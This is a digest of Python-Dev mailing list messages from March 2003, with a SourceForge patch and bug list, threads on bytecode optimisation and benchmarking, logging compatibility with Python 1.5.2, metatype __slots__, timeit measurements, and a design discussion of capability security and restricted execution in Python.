New Patches
-----------

Use datetime in _strptime (2003-02-23)
	http://python.org/sf/691928
fix bug 625698, speed up some comparisons (2003-02-25)
	http://python.org/sf/693221
fix for bug 639806: default for dict.pop (2003-02-26)
	http://python.org/sf/693753
fix for bug 672614 :) (2003-02-28)
	http://python.org/sf/695250
environment parameter for popen2 (2003-02-28)
	http://python.org/sf/695275
fix bug 678519: cStringIO self iterator (2003-03-01)
	http://python.org/sf/695710

Closed Bugs
-----------

Compiler complaints in posixmodule.c (2001-11-28)
	http://python.org/sf/486434
import with undefineds can crash python (2001-12-02)
	http://python.org/sf/488184
mkcwproject: custom __initialize routine (2001-12-13)
	http://python.org/sf/492465
macfs.FSSpec and Carbon.File.FSSpec fail for "new" files (2002-07-24)
	http://python.org/sf/585923
OSA Python integration (2002-07-26)
	http://python.org/sf/586998
IDE should have "open recent" menu (2002-09-11)
	http://python.org/sf/607810
IDE output window (2002-09-11)
	http://python.org/sf/607821
IDE - Breakpoints don't stick to lines (2002-09-11)
	http://python.org/sf/608085
unicode alphanumeric regexp bug (2002-09-16)
	http://python.org/sf/610299
Reorganize MacPython resources on OSX (2002-10-19)
	http://python.org/sf/625725
remove debug prints from macmain.c (2002-11-08)
	http://python.org/sf/635570
ic module "path too long" error (2002-11-26)
	http://python.org/sf/644243
dynload_next needs better errors (2002-12-12)
	http://python.org/sf/652590
Compiling C sources with absolute path bug (2003-01-15)
	http://python.org/sf/668662
after using pdb readline does not work correctly (2003-01-28)
	http://python.org/sf/676342
Can't build C ext on OS X with 'altinstall' python (2003-01-29)
	http://python.org/sf/677293
python.exe expected in extension builds (2003-01-30)
	http://python.org/sf/677753
plistlib.py selftest fails (2003-02-07)
	http://python.org/sf/682317
Future division breaks mpz (2003-02-16)
	http://python.org/sf/687654
Bundlebuilder needs to pre-convert resource files (2003-02-17)
	http://python.org/sf/688007
macresource should handle readonly applesingle files (2003-02-17)
	http://python.org/sf/688011
IDLE does not work on Mac OS X (2003-02-17)
	http://python.org/sf/688266
64-bit int and long hash keys incompatible (2003-02-19)
	http://python.org/sf/689659
Docs page has no PEPs link (2003-02-19)
	http://python.org/sf/689826
2.3a2 build fails under IRIX 6.5 (2003-02-20)
	http://python.org/sf/690012
test_posix fails when run in non-interactive mode (2003-02-20)
	http://python.org/sf/690081
sys.last_type is missing (2003-02-20)
	http://python.org/sf/690109
lines run together on input (2003-02-20)
	http://python.org/sf/690285
2.3a2 Sol8 make fails at _iconv_codec. (2003-02-20)
	http://python.org/sf/690309
apply fails to check if warning raises exception (2003-02-20)
	http://python.org/sf/690435
_POSIX_C_SOURCE redefined (2003-02-21)
	http://python.org/sf/691005
shutil.copytree documentation bug (2003-02-22)
	http://python.org/sf/691276
codecs.open(filename, 'U', 'UTF-16') corrupts text (2003-02-22)
	http://python.org/sf/691291

Closed Patches
--------------

Patch for sre bug 610299 (2002-11-04)
	http://python.org/sf/633359
array.append is sloooow (2003-02-16)
	http://python.org/sf/687598
2.3 .spec file for building RPMs. (2003-02-18)
	http://python.org/sf/688584


From vinay_sajip@red-dove.com  Sun Mar  2 14:33:05 2003
From: vinay_sajip@red-dove.com (Vinay Sajip)
Date: Sun, 2 Mar 2003 14:33:05 -0000
Subject: [Python-Dev] Changes to logging in CVS
Message-ID: <006801c2e0c8$a4227d80$652b6992@alpha>

I see that recent changes were made in logging/__init__.py to replace the
use of "apply(func, args)" with "func(*args)". Doesn't this cause "invalid
syntax" problems with 1.5.2? I explicitly coded using apply because I
thought it was needed for 1.5.2. There are a few places where I've eschewed
use of +=, for the same reason. Any chance we could change back to using
apply()?

Regards

Vinay


From mal@lemburg.com  Sun Mar  2 19:23:26 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sun, 02 Mar 2003 20:23:26 +0100
Subject: [Python-Dev] Changes to logging in CVS
In-Reply-To: <006801c2e0c8$a4227d80$652b6992@alpha>
References: <006801c2e0c8$a4227d80$652b6992@alpha>
Message-ID: <3E625A2E.1040508@lemburg.com>

Vinay Sajip wrote:
> I see that recent changes were made in logging/__init__.py to replace the
> use of "apply(func, args)" with "func(*args)". Doesn't this cause "invalid
> syntax" problems with 1.5.2? I explicitly coded using apply because I
> thought it was needed for 1.5.2. There are a few places where I've eschewed
> use of +=, for the same reason. Any chance we could change back to using
> apply()?

You should mark the files you need 1.5.2 compatibility for in the
source code. Even though PEP 291 mentions your package, I don't
think that everybody knows about this PEP...

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 02 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     30 days left
EuroPython 2003, Charleroi, Belgium:                       114 days left


From vinay_sajip@red-dove.com  Sun Mar  2 19:39:16 2003
From: vinay_sajip@red-dove.com (Vinay Sajip)
Date: Sun, 2 Mar 2003 19:39:16 -0000
Subject: [Python-Dev] Changes to logging in CVS
References: <006801c2e0c8$a4227d80$652b6992@alpha> <3E625A2E.1040508@lemburg.com>
Message-ID: <000f01c2e0f3$6a7dcfa0$652b6992@alpha>

> > I see that recent changes were made in logging/__init__.py to replace
the
> > use of "apply(func, args)" with "func(*args)". Doesn't this cause
"invalid
> > syntax" problems with 1.5.2? I explicitly coded using apply because I
> > thought it was needed for 1.5.2. There are a few places where I've
eschewed
> > use of +=, for the same reason. Any chance we could change back to using
> > apply()?
>
> You should mark the files you need 1.5.2 compatibility for in the
> source code. Even though PEP 291 mentions your package, I don't
> think that everybody knows about this PEP...

Fair enough, but the docstring at the top of __init__.py states:

"Should work under Python versions >= 1.5.2, except that source line
information is not available unless 'sys._getframe()' is."

Do you mean that I need to mention this wherever the source code contains
some 1.5.2-constrained idiom like "apply(func, args)" or "a = a + 1", so
that it's explicit that it was coded that way for a reason?

Regards,

Vinay


From guido@python.org  Sun Mar  2 20:42:37 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 02 Mar 2003 15:42:37 -0500
Subject: [Python-Dev] Re: Changes to logging in CVS
In-Reply-To: "Your message of Sun, 02 Mar 2003 14:33:05 GMT."
 <006801c2e0c8$a4227d80$652b6992@alpha>
References: <006801c2e0c8$a4227d80$652b6992@alpha>
Message-ID: <200303022042.h22KgbX18847@pcp02138704pcs.reston01.va.comcast.net>

> I see that recent changes were made in logging/__init__.py to
> replace the use of "apply(func, args)" with "func(*args)". Doesn't
> this cause "invalid syntax" problems with 1.5.2? I explicitly coded
> using apply because I thought it was needed for 1.5.2. There are a
> few places where I've eschewed use of +=, for the same reason. Any
> chance we could change back to using apply()?

My apologies.  I forgot about this.  I'll roll it back.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tismer@tismer.com  Sun Mar  2 21:06:40 2003
From: tismer@tismer.com (Christian Tismer)
Date: Sun, 02 Mar 2003 22:06:40 +0100
Subject: [Python-Dev] __slots__ for metatypes
Message-ID: <3E627260.5050807@tismer.com>

Hi Guido, all,

last year, I wrote a patch that allows meta-types to have
slots. You had no time to look into it, and I said
"take your time and wait until it is stable".

I have been using this for quite a while now,
and today I updated it for Python 2.3 .
The patch is very small and simple.
Essentially, it doesn't use a fixed offset into the
internal etype structure, but computed this based upon
tp_basicsize.

This small patch also gives lots of flexibility to people,
who like to add extra stuff to their dynamic type objects.
(Well, I do this frequently)

It would be nice if we could add this small feature, soon.

http://www.python.org/sf/696193

Due to some SF bug, I had to submit this patch twice.

thanks a lot - chris
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From newsgroups1@bitfurnace.com  Mon Mar  3 01:55:57 2003
From: newsgroups1@bitfurnace.com (Damien Morton)
Date: Sun, 2 Mar 2003 20:55:57 -0500
Subject: [Python-Dev] Re: new bytecode results
References: <001301c2def2$09d374a0$6401a8c0@damien> <3E5F2260.3080808@lemburg.com> <b3o4ti$nsl$1@main.gmane.org> <b3re2i$rad$1@main.gmane.org>
Message-ID: <b3ud1u$ee4$1@main.gmane.org>

I optimised the layout of the python opcodes using a simulated annealing
process that scored adjacent opcodes according to their frequency of
co-occurence.

This raised my PyStone benchmark from 22100 to 22700, for a 3% gain.

Ive been using Skip's DXP server to gather statistics, but there isnt much
data there. I should be able to achieve better results if more people
contributed stats to his server, more information about which can be found
here:
http://manatee.mojam.com/~skip/python/

The process of layout the opcodes and switch cases has largely been
automated, and generating new layouts is relatively painless and quick. Do
please contribute stats for 2.3a2 to Skip's DXP server.

I also implemented a LOAD_FASTER opcode, with the argument encoded into the
opcode.

This raised my PyStone benchmark from 22700 to 23150, for a total 5% gain.

The main switch loop looks like this now:

if (opcode >= LOAD_FASTER) {
  load_fast(opcode - LOAD_FASTER);
  ...
  goto fast_next_opcode;
  }
switch(opcode) {
  case LOAD_ATTR:
    oparg = NEXTARG();
    w = GETITEM(names, oparg);
    ...
    break;
  ...
}

Each opcode case now loads its own argument as necessary. The test for
HAVE_ARGUMENT is now implemented using an array of bytes. The test now
happens very infrequently, so any performance loss is negligible.

const char HASARG[] = {
  0 , /* STOP_CODE */
  1 , /* LOAD_ATTR */
  1 , /* CALL_FUNCTION */
  1 , /* STORE_FAST */
  0 , /* BINARY_ADD */
  0 , /* SLICE+0 */
  0 , /* SLICE+1 */
  0 , /* SLICE+2 */
...
}


From tim.one@comcast.net  Mon Mar  3 04:06:30 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 02 Mar 2003 23:06:30 -0500
Subject: [Python-Dev] Re: new bytecode results
In-Reply-To: <A32C76BE-4B34-11D7-9319-003065ABC53C@pacbell.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEBDEAAB.tim.one@comcast.net>

[Dan Wolfe]
> In the last year of lurking on this list, I've seen requests for a good
> python benchmark no less than 4 times - the most recent being damien
> morton's attempt to prove/disprove his optimizations.
>
> Having an "approved" good benchmark/realistic test program would make
> it easy to validate optimizations, and head off the consistent 'pystone
> is not a realistic benchmark' arguments that come up each time....

pystone is a very good benchmark for one thing:  testing the "general speed"
of the interpreter.  Perhaps because it *is* so atypical, it's hard to do
something that gives pystone a significant speed boost.  Rewriting the eval
loop several years ago managed to do that, and ruthlessly cutting slop out
of the dict implementation gave it an 8% boost more recently.  I can't
recall any other single thing that helped pystone as much as those.  Jim
Fulton claims that pystone is a good predictor of Zope speed on a new box,
and now that I know more about Zope than I used to, I believe that:  while
Zope may look like Python code, there are so many meta-tricks being played
under the covers that it's plausible that the only thing that really matters
is how fast you can get around the eval loop.

Anyway, several years ago I offered to collect and organize a set of
"typical" benchmarks.  Nobody responded, so that turned out to be a lot
easier than I thought it would be <wink>.

> Besides, it will take a 6 months just to agree to a basic framework,
> and another 6 months to work around all the "competitive optimization
> tricks" timbot has up his sleeve...

You can't help it.  If you know the code in advance, the implementation
*will* get warped to favor it.  The best you can hope for is that warping
won't be done at the expense of other code.  For example, if you decide to
reorder the eval loop case statements, and use pystone as your measure of
goodness, you'll end up with a different order than if you use test_descr.py
as your measure.  Is that cheating?  I suppose it depends on who's doing it
<wink>.


From tim.one@comcast.net  Mon Mar  3 04:14:55 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 02 Mar 2003 23:14:55 -0500
Subject: [Python-Dev] module extension search order - can it be changed?
In-Reply-To: <2m7kbk30li.fsf@starship.python.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBEEAAB.tim.one@comcast.net>

[Michael Hudson]
> While we're at it, linecache's charming habit of occasionally giving
> out of date information is Pure Evil.  Performance my arse, lying to
> the user is worse.

We don't use linecache often, and I've never tried comparative timing (with
and without it).  Offhand it's hard to believe that producing tracebacks
benefits from it, or that inspect.py does.  For 2.3b1, maybe we could change
linecache.updatecache() to leave the cache empty and see whether anyone
notices <0.7 wink>.


From python@rcn.com  Mon Mar  3 04:57:01 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 2 Mar 2003 23:57:01 -0500
Subject: [Python-Dev] Re: new bytecode results
References: <LNBBLJKPBEHFEDALKOLCEEBDEAAB.tim.one@comcast.net>
Message-ID: <003f01c2e141$53f6c400$125ffea9@oemcomputer>

From: "Tim Peters" <tim.one@comcast.net>
> [Dan Wolfe]
> > In the last year of lurking on this list, I've seen requests for a good
> > python benchmark no less than 4 times - the most recent being damien
> > morton's attempt to prove/disprove his optimizations.
> >
> > Having an "approved" good benchmark/realistic test program would make
> > it easy to validate optimizations, and head off the consistent 'pystone
> > is not a realistic benchmark' arguments that come up each time....
> 
> pystone is a very good benchmark for one thing:  testing the "general speed"
> of the interpreter.  Perhaps because it *is* so atypical, it's hard to do
> something that gives pystone a significant speed boost

I've been working with Damien to make sure the improvements
are not pystone specific.  We've run against my highly optimized
matrix code, against pybench, and against another one of my
programs which heavily exercises a broad range of python tools.

Overall, his improvements have helped across the board.
I think his lastest and greatest should be accepted unless
there is a maintainability hit.  However, the core concept
and code seems clean enough to me.

FWIW,


Raymond Hettinger


From ben@algroup.co.uk  Mon Mar  3 13:42:43 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Mon, 03 Mar 2003 13:42:43 +0000
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <15933.30607.900530.370402@localhost.localdomain>
References: <15930.48758.62473.425111@slothrop.zope.com>	<Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org> <15933.30607.900530.370402@localhost.localdomain>
Message-ID: <3E635BD3.9000107@algroup.co.uk>

My attentions was drawn to this unanswered email, so here goes...

Jeremy Hylton wrote:
>>>>>>"KPY" == Ka-Ping Yee <ping@zesty.ca> writes:
> 
> 
>   KPY> Wow, how did this topic end up crossing over to this list while
>   KPY> i wasn't looking?  :0
> 
> You sure react quick for someone who isn't looking <wink>.
> 
>   >> A capability system must have some rules for creating and copying
>   >> capabilities, but there is more than one way to realize those
>   >> rules in a programming language.
> 
>   KPY> I suppose there could be, but there is really only one obvious
>   KPY> way: creating a capability is equivalent to creating an object
>   KPY> -- which you can only do if you hold the constructor.  A
>   KPY> capability is copied into another object (for the security
>   KPY> folks, "object" == "protection domain") when it is transmitted
>   KPY> as an argument to a method call.
> 
>   KPY> To build a capability system, all you need to do is to
>   KPY> constrain the transfer of object references such that they can
>   KPY> only be transmitted along other object references.  That's all.
> 
> I don't follow you hear.  What does it mean to "transmit along other
> object references?"  That is, everything in Python is an object and
> the only kind of references that exist are object references.

He's actually going slightly in circles here. The idea is that in order 
to acquire an object reference you either create the object, or are 
given the reference by another object you already have a reference to, 
or are given it by another object that has a reference to you. Where 
"you" is some object, of course.

What is _not_ supposed to happen is finding objects by poking around in 
the symbol table, for example.

> I think, based on your the rest of your mail, that we're largely on
> the same page, but I'd like to make sure I understand where you're
> coming from.
> 
> I don't quite follow the definition of protection domain either, as
> most of the literature I'm familiar with (not much of it about
> capabilities specifically) talks about a protection domain as the set
> of objects a principal has access to.  The natural way to extend that
> to capabilities seems to me to be that a protection domain is the set
> of capabilities possessed by a principal.

That sounds right. The transitive closure of the capabilties possessed 
by a principal is also interesting, though the code in the objects 
determines whether you have access to any particular member of that set 
in practice.

> Are these questions are off-topic for python-dev?
> 
> At any rate, it still seems like there are a variety of ways to
> realize capabilities in a programming language.  For example, ZODB
> uses a special base class called Persistent to mark persistent
> objects.  One could imagine using the same approach so that only some
> objects have capabilities associated with them.

This was the approach I tool initially but its substantially more messy 
than using bound methods.

>   KPY> The problem for Python, as Jeremy explained, is that there are
>   KPY> so many other ways of crawling into objects and pulling out
>   KPY> bits of their internals.
> 
>   KPY> Off the top of my head, i only see two things that would have
>   KPY> to be fixed to turn Python into a capability-secure system:
> 
>   KPY> 1. Access to each object is limited to its declared exposed
>   KPY>      interface; no introspection allowed.
> 
>   KPY> 2. No global namespace of modules (sys.modules etc.).
> 
>   KPY> If there is willingness to consider a "secure mode" for Python
>   KPY> in which these two things are enforced, i would be interested
>   KPY> in making it happen.
> 
> I think there is interest and I agree with your problem statement.
> I'd rephrase 2 to make it more general.  Control access to other
> modules.  The import statement is just as much of a problem as
> sys.modules, right?  In a secure environment, you have to control what
> code can be loaded in the first place.

Correct.

>   >> In Python, there is no private.
> 
>   KPY> Side note (probably irrelevant): in some sense there is, but
>   KPY> nobody uses it.  Scopes are private.  If you were to implement
>   KPY> classes and objects using lambdas with message dispatch
>   KPY> (i.e. the Scheme way, instead of having a separate "class"
>   KPY> keyword), then the scoping would take care of all the
>   KPY> private-ness for you.
> 
> I was aware of Rees's dissertation when I did the nested scopes and,
> partly as a result, did not provide any introspection mechanism for
> closures.  That is, you can get at a function's func_closure slot but
> there's no way to look inside the cells from Python.  I was thinking
> that closures could replace Bastions.  It stills seems possible, but
> on several occasions I've wished I could introspect about closures
> from Python code.  I'm also unsure that the idea flies so well for
> Python, because you really want secure Python to be as much like
> regular Python as possible.  If the mechanism is based on functions,
> it seems hard to make it work naturally for classes and instances.
> 
>   >> The Zope proxy approach seems a little more promising, because it
>   >> centralizes all the security machinery in one object, a security
>   >> proxy.  A proxy for an object can appear virtually
>   >> indistinguishable for the object itself, except that type(proxy)
>   >> != type(object_being_proxied).  The proxy guarantees that any
>   >> object returned through the proxy is wrapped in its own proxy,
>   >> except for simple immutable objects like ints or strings.
> 
>   KPY> The proxy mechanism is interesting, but not for this purpose.
>   KPY> A proxy is how you implement revocation of capabilities: if you
>   KPY> insert a proxy in front of an object and grant access to that
>   KPY> proxy, then you can revoke the access just by telling the proxy
>   KPY> to stop responding.
> 
> Sure, you can use proxies for revocation, but that's not what I was
> trying to say.
> 
> I think the fundamental problem for rexec is that you don't have a
> security kernel.  The code for security gets scatter throughout the
> interpreter.  It's hard to have much assurance in the security when
> its tangled up with everything else in the language.
> 
> You can use a proxy for an object to deal with goal #1 above --
> enforce an interface for an object.  I think about this much like a
> hardware capability architecture.  The protected objects live in the
> capability segment and regular code can't access them directly.  The
> only access is via a proxy object that is bound to the capability.
> 
> Regardless of proxy vs. rexec, I'd be interested to hear what you
> think about a sound way to engineer a secure Python.

I'm told that proxies actually rely on rexec, too. So, I guess whichever 
approach you take, you need rexec.

The problem is that although you can think about proxies as being like a 
segmented architecture, you have to enforce that segmentation. And that 
means doing so throughout the interpreter, doesn't it? I suppose it 
might be possible to abstract things in some way to make that less 
widespread, but probably not without having an adverse impact on speed.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From guido@python.org  Mon Mar  3 14:40:40 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 03 Mar 2003 09:40:40 -0500
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: Your message of "Mon, 03 Mar 2003 13:42:43 GMT."
 <3E635BD3.9000107@algroup.co.uk>
References: <15930.48758.62473.425111@slothrop.zope.com> <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org> <15933.30607.900530.370402@localhost.localdomain>
 <3E635BD3.9000107@algroup.co.uk>
Message-ID: <200303031440.h23Eeea16004@odiug.zope.com>

> I'm told that proxies actually rely on rexec, too. So, I guess whichever 
> approach you take, you need rexec.

Yes and no.  It's unclear what *you* mean when you say "rexec".  There
is a standard module by that name that employs Python's support for
tighter security and sets up an entire restricted execution
environment.  And then there's the underlying facilities in Python,
which allow you to override __import__ and all other built-ins; this
facility is often called "restricted execution."  Zope security
proxies rely on the latter facilities, but not on the rexec module.

I suggest that in order to avoid confusion, you should use "restricted
execution" when that's what you mean, and use "rexec" only to refer to
the standard module by that name.

> The problem is that although you can think about proxies as being like a 
> segmented architecture, you have to enforce that segmentation. And that 
> means doing so throughout the interpreter, doesn't it? I suppose it 
> might be possible to abstract things in some way to make that less 
> widespread, but probably not without having an adverse impact on speed.

The built-in restricted execution facilities indeed do distinguish
between two security domains: restricted and unrestricted.  In
restricted mode, certain introspection APIs are disallowed.
Restricted execution is enabled as soon as a particular global scope's
__builtins__ is not the standard __builtins__, which is by definition
the __dict__ of the __builtin__ module (note __builtin__, which is a
module, vs. __builtins__, which is a global).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From ben@algroup.co.uk  Mon Mar  3 17:56:20 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Mon, 03 Mar 2003 17:56:20 +0000
Subject: [Python-Dev] Capabilities in Python
In-Reply-To: <200303031440.h23Eeea16004@odiug.zope.com>
References: <15930.48758.62473.425111@slothrop.zope.com> <Pine.LNX.4.33.0301311503511.30241-100000@server1.lfw.org> <15933.30607.900530.370402@localhost.localdomain>              <3E635BD3.9000107@algroup.co.uk> <200303031440.h23Eeea16004@odiug.zope.com>
Message-ID: <3E639744.5050407@algroup.co.uk>

Guido van Rossum wrote:
>>I'm told that proxies actually rely on rexec, too. So, I guess whichever 
>>approach you take, you need rexec.
> 
> 
> Yes and no.  It's unclear what *you* mean when you say "rexec".  There
> is a standard module by that name that employs Python's support for
> tighter security and sets up an entire restricted execution
> environment.  And then there's the underlying facilities in Python,
> which allow you to override __import__ and all other built-ins; this
> facility is often called "restricted execution."  Zope security
> proxies rely on the latter facilities, but not on the rexec module.
> 
> I suggest that in order to avoid confusion, you should use "restricted
> execution" when that's what you mean, and use "rexec" only to refer to
> the standard module by that name.

OK, I mean restricted execution.

>>The problem is that although you can think about proxies as being like a 
>>segmented architecture, you have to enforce that segmentation. And that 
>>means doing so throughout the interpreter, doesn't it? I suppose it 
>>might be possible to abstract things in some way to make that less 
>>widespread, but probably not without having an adverse impact on speed.
> 
> 
> The built-in restricted execution facilities indeed do distinguish
> between two security domains: restricted and unrestricted.  In
> restricted mode, certain introspection APIs are disallowed.
> Restricted execution is enabled as soon as a particular global scope's
> __builtins__ is not the standard __builtins__, which is by definition
> the __dict__ of the __builtin__ module (note __builtin__, which is a
> module, vs. __builtins__, which is a global).

Oh, I understand that, but the complaint was that it is spread all over 
the interpreter. One of the nice thing about hardware enforced 
segmentation is that you have a high assurance that it really is segemented.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From newsgroups1@bitfurnace.com  Mon Mar  3 23:55:47 2003
From: newsgroups1@bitfurnace.com (Damien Morton)
Date: Mon, 3 Mar 2003 18:55:47 -0500
Subject: [Python-Dev] JUMP_IF_X opcodes
Message-ID: <b40qcp$rsm$1@main.gmane.org>

I have been reviewing the compile.c module with respect to the use of
JUMP_IF_XXX opcodes, and the frequency with which these opcodes are followed
by a POP_TOP instruction.

It seems to me that there are two kinds of uses cases for these opcodes,

The first use case could be expressed as POP_THEN_JUMP_IF_XXXX
The second use case could be expressed as JUMP_IF_XXX_ELSE_POP

Listed below are the use cases for these instructions, and the functions in
compile.c that they apear in.

The form is JUMP_IF_XXX(top-of-stack-if-no-jump, top-of-stack-if-jump)


com_assert_stmt - JUMP_IF_TRUE(-,-)
com_if_stmt - JUMP_IF_FALSE(-,-)
com_while_stmt - JUMP_IF_FALSE(-,-)
com_try_except - JUMP_IF_FALSE(-,-)
com_list_if - JUMP_IF_FALSE(-, -)

com_comparison - JUMP_IF_FALSE(-, 0)
com_and_test - JUMP_IF_FALSE(-, 0)
com_test - JUMP_IF_TRUE(-, 1)

Below is a minimally intrusive implementation of the expansion of
JUMP_IF_FALSE into two opcodes for handling the two use cases.


case JUMP_IF_FALSE_ELSE_POP:
case POP_THEN_JUMP_IF_FALSE:
 NEXTARG(oparg);
 err = PyObject_IsTrue(TOP());
 if (err > 0) {
  err = 0;
  POP();
  }
 else if (err == 0) {
  if (opcode == POP_THEN_JUMP_IF_FALSE) POP();
  JUMPBY(oparg);
  }
 else
  break;
 continue;


Comments, suggestions, etc, appreciated.


From dave@boost-consulting.com  Tue Mar  4 00:29:58 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Mon, 03 Mar 2003 19:29:58 -0500
Subject: [Python-Dev] Re: __slots__ for metatypes
References: <3E627260.5050807@tismer.com>
Message-ID: <uadgcnfcp.fsf@boost-consulting.com>

Christian Tismer <tismer@tismer.com> writes:

> This small patch also gives lots of flexibility to people,
> who like to add extra stuff to their dynamic type objects.
> (Well, I do this frequently)
>
> It would be nice if we could add this small feature, soon.
>
> http://www.python.org/sf/696193

Yes, please, if possible.

-Dave
-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From neal@metaslash.com  Tue Mar  4 02:56:26 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Mon, 03 Mar 2003 21:56:26 -0500
Subject: [Python-Dev] JUMP_IF_X opcodes
In-Reply-To: <b40qcp$rsm$1@main.gmane.org>
References: <b40qcp$rsm$1@main.gmane.org>
Message-ID: <20030304025626.GA24615@epoch.metaslash.com>

On Mon, Mar 03, 2003 at 06:55:47PM -0500, Damien Morton wrote:
> I have been reviewing the compile.c module with respect to the use of
> JUMP_IF_XXX opcodes, and the frequency with which these opcodes are followed
> by a POP_TOP instruction.
> 
> It seems to me that there are two kinds of uses cases for these opcodes,
> 
> The first use case could be expressed as POP_THEN_JUMP_IF_XXXX
> The second use case could be expressed as JUMP_IF_XXX_ELSE_POP
> 
> Comments, suggestions, etc, appreciated.

I think you won't get much of a benefit by adding the 2+ instructions
necessary for this scheme.  I think it would be best to have
JUMP_IF_XXX always do a POP_TOP and never jump to a jump.  Below is an
example of some code and the disassembly.

        >>> def f(a, b):
        ...   if a and b:
        ...     print 'nope'
        ... 
        >>> dis.dis(f)
          2           0 LOAD_FAST                0 (a)
                      3 JUMP_IF_FALSE            4 (to 10)
                      6 POP_TOP             
                      7 LOAD_FAST                1 (b)
                >>   10 JUMP_IF_FALSE            9 (to 22)
                     13 POP_TOP             

          3          14 LOAD_CONST               1 ('no')
                     17 PRINT_ITEM          
                     18 PRINT_NEWLINE       
                     19 JUMP_FORWARD             1 (to 23)
                >>   22 POP_TOP             
                >>   23 LOAD_CONST               0 (None)
                     26 RETURN_VALUE        


Note the first JUMP_IF_FALSE jumps to the second JUMP_IF_FALSE which
then jumps to POP_TOP.  An optimized version of this code where the
POP is performed as part of the JUMP_IF_XXX could be:

        >>> dis.dis(f)
          2           0 LOAD_FAST                0 (a)
                      3 JUMP_IF_FALSE           11 (to 17)
                      6 LOAD_FAST                1 (b)
                >>    9 JUMP_IF_FALSE            5 (to 17)

          3          12 LOAD_CONST               1 ('no')
                     15 PRINT_ITEM          
                     16 PRINT_NEWLINE       
                >>   17 LOAD_CONST               0 (None)
                     20 RETURN_VALUE        

In the optimized version, there are at least 2 less iterations around
the eval_frame loop (when a is false).  1 POP_TOP, 1 JUMP_IF_FALSE.
If both a and b are true, the if body is executed and there are 3
iterations less.  2 POP_TOPs, 1 JUMP_FORWARD.  With more conditions,
the savings should be better.

The problem is that it's difficult to get the compiler to output this
code AFAIK.  I believe Skip's peephole optimizer did the
transformation to prevent a jump to a jump, but that was another pass.
The new compiler Jeremy is working on should make these sorts of
transformations easier.

All that said, the scheme you propose could provide a decent speed up.
The only way to know is to try. :-)

Neal


From guido@python.org  Thu Mar  6 03:55:27 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 05 Mar 2003 22:55:27 -0500
Subject: [Python-Dev] Fun with timeit.py
Message-ID: <200303060355.h263tRv28259@pcp02138704pcs.reston01.va.comcast.net>

At Jim's request, I added a utility module to the standard library
that implements state-of-the-art timing of code snippets.

Using a slightly modified version of this code, here's the cost in
microseconds of one for loop iteration (with 'pass' as the loop body)
in various Python versions.  All tests were run on my home machine: a
664 MHz Pentium III with 256 KB cache, running Red Hat Linux 7.3,
compiled with gcc 2.96.  Note the steady improvement over the
years. :-)

    version plain   -O
    ------- -----   -----
    1.3     0.625   n/a
    1.4     0.602   n/a
    1.5.2   0.606   0.466
    2.0     0.561   0.445
    2.1     0.591   0.436
    2.2     0.416   0.277
    2.3a2+  0.246   0.248 (1)

The invocation was "python timeit.py -r5" (with -O added for the last
column).  This times 5 runs of a million iterations each and prints
the time (normalized to usec per iteration) for the fastest run.  I
ran this twice for each combination and picked the lowest of the two;
there was never more than 0.002 usec difference.

(1) A mystery: the Python 2.3 binary installed in /usr/local/bin
measured 0.266 for the -O case, but 0.248 without -O; i.e. -O made it
slower!  The byte-for-byte identical binary in my build tree produced
the more reasonable measurements given in the table.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From brett@python.org  Thu Mar  6 06:46:28 2003
From: brett@python.org (Brett Cannon)
Date: Wed, 5 Mar 2003 22:46:28 -0800 (PST)
Subject: [Python-Dev] Pre-PyCon sprint ideas
Message-ID: <Pine.SOL.4.53.0303052240090.4109@death.OCF.Berkeley.EDU>

In an effort to help Guido (did you get my email about the rough draft of
the email to send out to the rest of the world?) I am trying to gather
ideas for what the Python core sprint can focus on.  I have set up a wiki
page at http://www.python.org/cgi-bin/moinmoin/PyCoreSprint for people to
add ideas to.  If there is something you think deserves sprint attention
then go add it.

-Brett


From Raymond Hettinger" <python@rcn.com  Thu Mar  6 11:12:54 2003
From: Raymond Hettinger" <python@rcn.com (Raymond Hettinger)
Date: Thu, 6 Mar 2003 06:12:54 -0500
Subject: [Python-Dev] More Zen
Message-ID: <000f01c2e3d1$561b60a0$125ffea9@oemcomputer>

Iterators unified access to containers -- lets find more of those.
Substitutability simplifies development 
    so shelves have a full dictionary interface
    but tuples won't sprout a count method
    because lists differ in intent.
Deprecation comes at a price but cruft has a cost of its own.
Holistic refactoring beats piecemeal optimization.
